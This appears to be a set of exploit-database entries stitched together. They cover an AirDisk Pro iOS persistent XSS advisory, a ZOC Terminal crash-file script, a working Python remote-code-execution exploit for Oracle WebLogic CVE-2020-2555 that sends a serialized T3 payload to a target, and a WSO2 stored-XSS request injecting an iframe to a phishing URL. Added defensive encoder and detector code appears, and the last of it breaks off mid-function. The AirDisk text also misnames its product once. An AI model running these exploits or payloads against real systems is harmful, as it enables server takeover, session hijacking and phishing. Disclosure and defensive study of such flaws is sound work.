
# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: http://www.app2pro.com
# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421
# CVE: N/A

Document Title:
===============
AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2203


Release Date:
=============
2020-04-15


Vulnerability Laboratory ID (VL-ID):
====================================
2203


Common Vulnerability Scoring System:
====================================
4.5


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
File sharing with other iOS devices via Bluetooth or Wi-Fi connection
with automatic search of nearest devices.
Users can perform file operations on the application like: Copy, Move,
Zip, Unzip, Rename, Delete, Email, and more.
Easy to create file like: Text File, New folder, Playlist, Take
Photo/Video, Import From Library, and Voice Record.
AirDisk Pro allows you to store, view and manage files on your iPhone,
iPad or iPod touch. You can connect to AirDisk
Pro from any Mac or PC over the Wi-Fi network and transfer files by drag
& drop files straight from the Finder or Windows
Explorer. AirDisk Pro features document viewer, PDF reader, music
player, image viewer, voice recorder, text editor, file
manager and support most of the file operations: like delete, move,
copy, email, share, zip, unzip and more.

(Copy of the Homepage:
https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 )
(Copy of the Homepage: http://www.app2pro.com )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile
application.


Affected Product(s):
====================
Felix Yew
Product: AirDisk Pro v5.5.3 (iOS)


Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerabilities have been
discovered in the official SuperBackup v2.0.5 ios mobile application.
The vulnerabilities allow remote attackers to inject their own malicious
script code with a persistent attack vector to compromise the mobile
web-application from the application-side.

The first vulnerability is located in the `createFolder` parameter of
the `Create Folder` function. Attackers are able to name
or rename paths via the airdisk pro ui with malicious persistent script
code. The injected script code then executes on the front site of the
path index listing, in the content itself, on each refresh. The request
method to inject is POST and the attack vector is located on the
application-side. Interaction to exploit is also possible through the
unauthenticated ftp service started on the local network.

The second vulnerability is located in the `deleteFile` parameter of the
`Delete` function. The output location, the popup that asks for
permission to delete, allows the script code to execute. The injection
point is the file parameter and the execution point occurs in the
visible delete popup with the permission question. The request method
to inject is POST and the attack vector is located on the
application-side.

The third web vulnerability is located in the `devicename` parameter
that is displayed on the top next to the airdisk pro ui logo.
Remote attackers are able to inject own malicious persistent script code
by manipulation of the local apple devicename information.
The injection point is the devicename information and the execution
point occurs in the file sharing ui panel of the airdisk pro
mobile web-application.

Remote attackers are able to inject their own script code into the
client-side requested vulnerable web-application parameters. The attack
vector of the vulnerability is persistent and the request method to
inject/execute is POST. The vulnerabilities are classic client-side
cross site scripting vulnerabilities. Successful exploitation of the
vulnerability results in session hijacking, persistent phishing
attacks, persistent external redirects to malicious sources and
persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] AirDisk pro Wifi UI

Vulnerable Parameter(s):
[+] createFolder
[+] deleteFile
[+] devicename


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with wifi access and low user interaction.
For a security demonstration or to reproduce the vulnerability, follow
the provided information and steps below.


1. Create Folder

PoC: Vulnerable Source
<tbody>
<form name="checkbox_form"></form>
<tr><td class="e"><input type="checkbox" name="selection"
value="test"></td><td class="i"><a href="test/"><img
src="/webroot/fileicons/folder.png"
width="20" height="20"></a></td><td class="n"><a
href="test/">test</a></td><td class="m">11 Apr 2020 at 12:35</td><td
class="s"></td><td class="k">Folder</td>
<td class="e"><span style="height:15px;
width:15px;">&nbsp;</span></td><td class="e"><a href="#" title="Rename
file" onclick="modalPopup("test", 0, 0);">
<img src="/webroot/webrename.png" width="15" height="15"></a></td><td
class="e"><a href="#" title="Delete file"
onclick="modalPopup("test", 2, 0);">
<img src="/webroot/webdelete.png" width="15"
height="15"></a></td></tr><tr class="c"><td class="e"><input
type="checkbox" name="selection"
value="test%3E%22%3Ciframe%20src=a%3E"></td><td class="i"><a
href="[MALICIOUS INJECTED SCRIPT
CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">
<img src="/webroot/fileicons/folder.png" width="20"
height="20"></a></td><td class="n">
<a href="[MALICIOUS INJECTED SCRIPT
CODE!]test%3E%22%3Ciframe%20src=evil.source%3E/">test>"<iframe
src="evil.source"></a></td>
<td class="m">11 Apr 2020 at 13:01</td><td class="s"></td><td
class="k">Folder</td><td class="e"><span style="height:15px;
width:15px;">&nbsp;</span></td><td class="e">
<a href="#" title="Rename file"
onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS
INJECTED SCRIPT CODE!];, 0, 1);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
class="e">
<a href="#" title="Delete file"
onClick="modalPopup("test%3E%22%3Ciframe%20src=evil.source%3E&quot[MALICIOUS
INJECTED SCRIPT CODE!];, 2, 1);">
<img src="/webroot/webdelete.png" width="15"
height="15"/></a></td></tr><tr><td class="e"><input type="checkbox"
name="selection" value="Help.webarchive" /></td>
<td class="i"><a href="Help.webarchive"><img
src="/webroot/fileicons/webarchive.png" width="20"
height="20"></a></td><td class="n">
<a href="Help.webarchive">Help.webarchive</a></td><td class="m">6 Dec
2019 at 05:22</td><td class="s">13.7 KB</td><td class="k">Safari Web
Archive</td>
<td class="e"><a href="#" title="Download file"
onClick="downloadFile("Help.webarchive");"><img
src="/webroot/webdownload.png"
width="15" height="15"/></a></td><td class="e"><a href="#" title="Rename
file" onClick="modalPopup("Help.webarchive", 0, 2);">
<img src="/webroot/webrename.png" width="15" height="15"/></a></td><td
class="e"><a href="#" title="Delete file"
onClick="modalPopup("Help.webarchive", 2, 2);"><img
src="/webroot/webdelete.png" width="15" height="15"/></a></td></tr>
</form>
</tbody>
</table>
</div>


--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/
Upgrade-Insecure-Requests: 1
createFolder=test>"<[MALICIOUS INJECTED SCRIPT
CODE!]>&ID=0&submitButton=Create
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 6257

Note: Injecting via ftp (mkdir or file upload) is also possible without
authentication in the default setup.



2. Delete / Old Popup

PoC: Vulnerable Source
<div id="modal-content" class="simplemodal-data" style="display: block;">
	<div id="modal-title"><h3>Delete File</h3></div>
	<div id="modal-text"><a>Are you sure you want to delete this
file?"test"</a></div>
	<form name="input" action="" method="post">
	<div id="modal-field"><input type="hidden" name="deleteFile"
value="test"<iframe src="evil.source">[MALICIOUS INJECTED SCRIPT
CODE]"></div>
	<input type="hidden" name="ID" id="ID" value="test">
	<input type="submit" name="submitButton" id="submitButton" value="Delete">
	</form>
</div>


--- PoC Session logs [POST] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
deleteFile=New Folder&ID=New Folder&submitButton=Delete
-
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4699


Note: The popup appears when somebody tries to delete the injected path.


3. Devicename


PoC: Vulnerable Source
<div id="headerWraper">
	<table border="0" cellspacing="0" cellpadding="0" width="100%">
	  <tr>
	    <td><a href="./"><img src="/webroot/webicon.png" id="headerImg"
width="57" height="57"/></a></td>
	    <td><h2>[MALICIOUS INJECTED SCRIPT CODE AS DEVICENAME]</h2></td>	
	  </tr>
    </table>
</div>


--- PoC Session logs [GET] ---
http://localhost:80/
Host: localhost:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://localhost:80
Connection: keep-alive
Referer: http://localhost:80/evil.source
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4612

Note: Executes each time the wifi sharing ui service of airdisk pro is
opened by local or remote users.


Solution - Fix & Patch:
=======================
1. Disallow special chars in folder and file names. Sanitize all
inputs and filter all involved parameters to prevent application-side
attacks.
2. Parse the output location of the popup permission message content to
prevent further executions after injects via the post method.
3. Sanitize the devicename displayed on top of the wifi user interface
with a secure parsing mechanism.
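The three fixes above come down to one input-side check and one output-side encoder per rendering context. The following is an added example, not the app's code or the advisory's: it builds the listing row from the PoC source once the vulnerable way (name concatenated raw into href, link text and the `modalPopup("...")` argument) and once with an encoder chosen per context, and applies the same HTML text encoding to the device name in the header. The name allowlist, the row markup and the shape of the `modalPopup` call are assumptions modelled on the PoC source.

```python
import html
import json
import re
import urllib.parse

# Allowlist for names created through createFolder / rename. This is an
# assumption for the example; the app's own rules are not on the page.
_SAFE_NAME = re.compile(r"[A-Za-z0-9 ._-]{1,255}")


def validate_folder_name(name: str) -> bool:
    """Input-side check: reject names carrying markup, quotes, slashes or traversal."""
    if not _SAFE_NAME.fullmatch(name):
        return False
    return name not in (".", "..")


def render_row_vulnerable(name: str) -> str:
    """Listing row as the advisory shows it: the name is concatenated raw into
    the href, the link text and the modalPopup("...") argument."""
    return (
        f'<td class="n"><a href="{name}/">{name}</a></td>'
        f'<td class="e"><a href="#" title="Delete file" '
        f"onclick='modalPopup(\"{name}\", 2, 0);'>delete</a></td>"
    )


def render_row_hardened(name: str) -> str:
    """Same row with one encoder per output context: percent-encoding for the
    URL path segment, HTML entity encoding for text and attributes, and a JSON
    string literal (then entity-encoded) for the argument inside onclick."""
    href = urllib.parse.quote(name, safe="") + "/"
    text = html.escape(name, quote=True)
    js_arg = html.escape(json.dumps(name), quote=True)
    return (
        f'<td class="n"><a href="{href}">{text}</a></td>'
        f'<td class="e"><a href="#" title="Delete file" '
        f'onclick="modalPopup({js_arg}, 2, 0);">delete</a></td>'
    )


def render_header_hardened(devicename: str) -> str:
    """Third finding: the device name inside <h2> needs the same HTML text encoding,
    because it is attacker-controlled data from the device, not trusted markup."""
    return f"<h2>{html.escape(devicename, quote=True)}</h2>"


def contains_raw_markup(rendered: str, marker: str = "<iframe") -> bool:
    """Check helper: does the rendered fragment still carry the tag verbatim?"""
    return marker in rendered


if __name__ == "__main__":
    # Constructed sample: the folder name from the advisory's PoC.
    injected = 'test>"<iframe src=evil.source>'
    print("valid name?", validate_folder_name(injected))
    print("vulnerable row leaks tag?", contains_raw_markup(render_row_vulnerable(injected)))
    print("hardened row leaks tag?", contains_raw_markup(render_row_hardened(injected)))
    print(render_header_hardened('Benjamin>"<iframe src=evil.source>'))
```

The output-side encoders matter more than the allowlist here: the advisory's own note says names can also be created over the unauthenticated ftp service, which bypasses any check in the web UI's create/rename form, so the listing must encode whatever it reads from disk.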


Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
in the application functions is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com    www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com    paste.vulnerability-db.com    infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab    facebook.com/VulnerabilityLab    youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php    vulnerability-lab.com/rss/rss_upcoming.php    vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    vulnerability-lab.com/register.php    vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website are trademarks of the vulnerability-lab team
and the specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.

Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
            
# Exploit Title: ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to reproduce the crash:
# 1.- Run this python script: it creates a new file "ZOC_7.25.5_Script.zrx"
# 2.- Open ZOC Terminal
# 3.- Select Script > Start REXX Script...
# 4.- Select the "ZOC_7.25.5_Script.zrx" file and click "open"
# 5.- ZOC Terminal crashes

# 20000 'A' bytes: an oversized script file that ZOC fails to handle
cod = "\x41" * 20000

# Write the crash file next to this script
with open('ZOC_7.25.5_Script.zrx', 'w') as f:
    f.write(cod)
            
# Exploit Title: Oracle WebLogic Server 12.2.1.4.0  -  Remote Code Execution
# Author: nu11secur1ty
# Date: 2020-03-31
# Vendor: Oracle
# Software Link:  https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip  
# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555
# CVE: CVE-2020-2555


[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
[+] Source:  readme from GitHUB


[Exploit Program Code]
--------------------------

#!/usr/bin/python
# @nu11secur1ty
import socket
import os
import sys
import struct

if len(sys.argv) < 3:
    print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)

server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)

# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)

data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data

payloadObj = open(sys.argv[3],'rb').read()

payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
payload=payload+payloadObj
payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x5
4\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'

payload=struct.pack('>I',len(payload)) + payload[4:]

print '[+] Sending payload...'
sock.send(payload)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data


[Vendor]
Oracle


[Vulnerability Type]
Network Remote



[Description]
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation).
Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.
Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence.
Successful attacks of this vulnerability can result in takeover of Oracle Coherence.
CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).


[Disclosure Timeline]
2019/12/10


[+] Disclaimer
The entry creation date may reflect when the CVE ID was allocated or reserved,
and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

[Video]
https://www.youtube.com/watch?v=59jt8rr8ECc 

@nu11secur1ty  

-- 

hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty
            
# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting
# Date: 2020-04-13
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Software link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A
# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700

Technical Details & Description:
================================
A remote stored cross site scripting vulnerability has been discovered
in the WSO2 API Manager Resource Browser component.
The security vulnerability allows a remote attacker with access to the
"Resource Browser" component to inject malicious code via the Add
Comment feature.

The vulnerability is triggered after sending a POST request to
`/carbon/info/comment-ajaxprocessor.jsp` with the parameters
"comment=targeted&path=%2F".
Remote attackers have the ability to spread malware, to hijack a session
(including a session with higher privileges), or to initiate phishing
attacks.

The security risk of the stored XSS web vulnerability is estimated as
medium with a CVSS (common vulnerability scoring system) count of 5.4.
Exploitation of the stored XSS web vulnerability requires a low privilege
web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in compromising the
server.


Request Method:
[+] POST

Module:
[+] /carbon/info/comment-ajaxprocessor.jsp

Parameters:
[+] comment=admincomment
[+] path=%2F
=======================================

POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
Host: 192.168.149.1:9443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
Content-Length: 64
Cookie: region3_registry_menu=visible; region3_metadata_menu=none;
wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e;
JSESSIONID=4B3AB3AA8895F2897685FA98C327D521;
requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none;
region4_monitor_menu=none; region5_tools_menu=none;
current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
Connection: close

comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F





==============================



HTTP/1.1 200

X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
vary: accept-encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 31 Dec 2019 10:50:00 GMT
Connection: close
Server: WSO2 Carbon Server
Content-Length: 3144


// the response body includes the attacker's malicious script unencoded


<a class="closeButton icon-link registryWriteOperation"
onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete"
style="background-image:
url(../admin/images/delete.gif);position:relative;float:right">&nbsp;</a>


 <iframe href=http://phishing_url>
 <br/>
posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker
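As an added example (not the advisory's or WSO2's code), the following detection helper parses a raw POST like the one above, percent-decodes the form values, including double-encoded ones of the kind visible in the app's own cookies (`%252C`), and flags any value carrying a tag or script handler. The sample requests are constructed from the advisory's request, reduced to the lines the check needs; the endpoint path is the one the advisory names.

```python
import re
import urllib.parse

COMMENT_ENDPOINT = "/carbon/info/comment-ajaxprocessor.jsp"

# Constructed samples: the advisory's POST reduced to the lines the check needs,
# plus a benign comment and a double-encoded variant.
MALICIOUS_REQUEST = (
    "POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1\r\n"
    "Host: 192.168.149.1:9443\r\n"
    "Content-type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
    "\r\n"
    "comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F"
)
BENIGN_REQUEST = (
    "POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1\r\n"
    "Host: 192.168.149.1:9443\r\n"
    "\r\n"
    "comment=Looks+fine+to+me%2C+approved&path=%2F"
)
DOUBLE_ENCODED_REQUEST = (
    "POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1\r\n"
    "Host: 192.168.149.1:9443\r\n"
    "\r\n"
    "comment=%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E&path=%2F"
)

# Anything that looks like an HTML tag, an on* event handler or a javascript: URL.
_TAG = re.compile(r"<\s*/?\s*[A-Za-z][^>]*>")
_HANDLER_OR_SCHEME = re.compile(r"(?i)\bon[a-z]+\s*=|javascript\s*:")


def parse_form_post(raw: str):
    """Split a raw HTTP request into (method, path without query, form params)."""
    head, _, body = raw.partition("\r\n\r\n")
    method, path, _ = head.split("\r\n", 1)[0].split(" ", 2)
    return method, path.split("?", 1)[0], urllib.parse.parse_qs(body, keep_blank_values=True)


def decode_repeatedly(value: str, limit: int = 3) -> str:
    """Undo nested percent-encoding, bounded so a hostile value cannot loop forever."""
    for _ in range(limit):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_markup(raw: str):
    """Return (param, decoded value) pairs on the comment endpoint that carry
    tags or script handlers; an empty list means nothing suspicious."""
    method, path, params = parse_form_post(raw)
    if method != "POST" or path != COMMENT_ENDPOINT:
        return []
    hits = []
    for name, values in params.items():
        for value in values:
            decoded = decode_repeatedly(value)
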